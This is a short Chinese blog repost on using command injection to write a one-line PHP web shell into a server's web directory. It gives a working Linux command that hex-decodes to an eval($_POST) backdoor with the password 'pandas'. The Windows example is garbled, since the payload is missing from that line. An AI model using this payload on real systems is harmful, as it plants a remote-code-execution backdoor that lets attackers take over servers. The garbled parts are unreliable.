命令注入写webshell

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

利用命令注入写一句话php webshell到web目录涉及到一些特殊字符的转义,假设需要写入

,方法如下:

 

 

WINDOWS:用^转义<,即执行echo ^ > web可写目录

 

LINUX:linux下需要用\来转义<,不过很多php都默认开启gpc。先用16进制转换一句话再用xxd命令把16进制还原,命令如下:

echo 3c3f706870206576616c28245f504f53545b70616e6461735d293b203f3e|xxd -r -ps > web

上面密码: pandas

转载于:https://my.oschina.net/9199771/blog/856425

你可能感兴趣的:(命令注入写webshell)